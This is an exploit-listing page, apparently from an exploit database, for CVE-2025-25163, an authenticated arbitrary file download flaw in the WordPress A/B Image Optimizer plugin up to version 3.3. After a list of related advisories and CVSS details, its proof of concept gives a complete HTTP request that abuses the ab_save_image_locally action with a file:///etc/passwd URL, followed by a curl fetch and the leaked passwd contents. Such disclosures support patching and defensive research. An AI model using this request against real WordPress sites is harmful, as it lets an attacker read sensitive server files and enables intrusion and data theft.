WordPress A/B Image Optimizer 3.3 Plugin Arbitrary File Download Vulnerability

🗓️ 18 Feb 2025 00:00:00Reported by RandomRobbieBFType

zdt🔗 0day.today👁 211 Views

WordPress A/B Image Optimizer up to version 3.3 allows authenticated file download vulnerabilities.

Reporter	Title	Published	Views	Family All 14
GithubExploit	Exploit for Path Traversal in Pluginab Plugin_A\/B_Image_Optimizer	19 Feb 202503:57	–	githubexploit
GithubExploit	Exploit for Path Traversal in Pluginab Plugin_A\/B_Image_Optimizer	18 Feb 202510:25	–	githubexploit
Circl	CVE-2025-25163	7 Feb 202510:18	–	circl
CNNVD	WordPress plugin A/B Image Optimizer 路径遍历漏洞	7 Feb 202500:00	–	cnnvd
CVE	CVE-2025-25163	7 Feb 202510:12	–	cve
Cvelist	CVE-2025-25163 WordPress Plugin A/B Image Optimizer Plugin <= 3.3 - Arbitrary File Download vulnerability	7 Feb 202510:12	–	cvelist
NVD	CVE-2025-25163	7 Feb 202510:15	–	nvd
OSV	CVE-2025-25163	7 Feb 202510:15	–	osv
Packet Storm	WordPress Plugin A/B Image Optimizer 3.3 Arbitrary File Download	18 Feb 202500:00	–	packetstorm
Patchstack	WordPress Plugin A/B Image Optimizer Plugin <= 3.3 - Arbitrary File Download vulnerability	2 Feb 202516:08	–	patchstack

# CVE-2025-25163
Plugin A/B Image Optimizer <= 3.3 - Authenticated (Subscriber+) Arbitrary File Download

# Description

The Plugin A/B Image Optimizer plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 3.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.

## Details

- **Type**: plugin
- **Slug**: images-optimizer
- **Affected Version**: 3.3
- **CVSS Score**: 6.5
- **CVSS Rating**: Medium
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
- **CVE**: CVE-2025-25163
- **Status**: Closed

POC
---

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal:8929
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Gecko/20100101 Firefox/135.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: wp-settings-1=product_cat_tab%3Dpop%26libraryContent%3Dbrowse; wp-settings-time-1=1739543461; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_f0174336378e6db874da2237e8c05ac1=superadmin%7C1740046038%7C1N8xr9D0vHFOPOWEa8SZgQgnMrADwNBlBuy2clxo5pS%7C1e77f848b7d3c4d32746de6c747e981273be0adb56efe08902946257e29284fe; tk_ai=woo%3AHJ877y%2BjNWutqlxgSuyOlVs2; woocommerce_items_in_cart=1; woocommerce_cart_hash=00dd4812a167442476e6e7ea663fc03e; wp_woocommerce_session_f0174336378e6db874da2237e8c05ac1=1%7C%7C1740046039%7C%7C1740042439%7C%7C81057c84ecef3df59f0857082ef7c538
Priority: u=4
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

action=ab_save_image_locally&imageUrl=file:///etc/passwd
```

```
{"id":5006,"url":"http:\/\/kubernetes.docker.internal:8929\/wp-content\/uploads\/2025\/02\/1739874247.gif"}
```

```
$ curl http://kubernetes.docker.internal:8929/wp-content/uploads/2025/02/1739874247.gif
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
```

18 Feb 2025 00:00Current

9.6High risk

Vulners AI Score9.6

CVSS 3.17.5 - 9.8

EPSS0.26359

SSVC